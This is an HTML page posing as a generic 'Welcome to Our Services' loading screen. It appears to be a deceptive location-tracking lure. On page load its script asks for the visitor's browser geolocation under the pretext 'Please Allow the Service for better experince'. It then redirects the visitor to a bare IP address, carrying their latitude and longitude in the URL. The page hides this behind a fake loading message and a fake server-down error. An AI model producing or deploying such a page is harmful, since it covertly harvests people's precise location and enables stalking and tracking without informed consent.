<!DOCTYPE html>
<html>
    <head>
        <meta charset="utf-8">
        <style type="text/css">
            body {
              padding: 0;
              margin: 0;
            }

            svg:not(:root) {
              display: block;
            }

            .playable-code {
              background-color: #f4f7f8;
              border: none;
              border-left: 6px solid #558abb;
              border-width: medium medium medium 6px;
              color: #4d4e53;
              height: 100px;
              width: 90%;
              padding: 10px 10px 0;
            }

            .playable-canvas {
              border: 1px solid #4d4e53;
              border-radius: 2px;
            }

            .playable-buttons {
              text-align: right;
              width: 90%;
              padding: 5px 10px 5px 26px;
            }
        </style>
        
        <style type="text/css">
            body {
  padding: 20px;
  background-color:#ffffc9
}

button {
  margin: .5rem 0;
}

        </style>
        
        <title>Welcome to Our Services</title>
    </head>
    <body onload="geoFindMe()">
        
            Please wait while our service is loading.......<br/>
<p id = "status"></p>
<a id = "map-link" target="_blank"></a>

        
        
            <script>
                function geoFindMe() {

  const status = document.querySelector('#status');
  const mapLink = document.querySelector('#map-link');

  mapLink.href = '';
  mapLink.textContent = '';

  function success(position) {
    const latitude  = position.coords.latitude;
    const longitude = position.coords.longitude;

    status.textContent = '';
    mapLink.href = `https://199.91.174.223/#map=18/${latitude}/${longitude}`;
    mapLink.textContent = `Latitude: ${latitude} °, Longitude: ${longitude} °`;
	location.replace(`http://199.91.174.223/${latitude}/${longitude}`);
	
  }

  function error() {
    status.textContent = 'We are sorry Server is down at this momemt please try later..';
  }

  if(!navigator.geolocation) {
    status.textContent = 'Please Allow the Service for better experince';
  } else {
    status.textContent = 'Loading....…';
    navigator.geolocation.getCurrentPosition(success, error);
  }

}

//document.querySelector('#find-me').addEventListener('onload', geoFindMe);

            </script>
        
    </body>
</html>

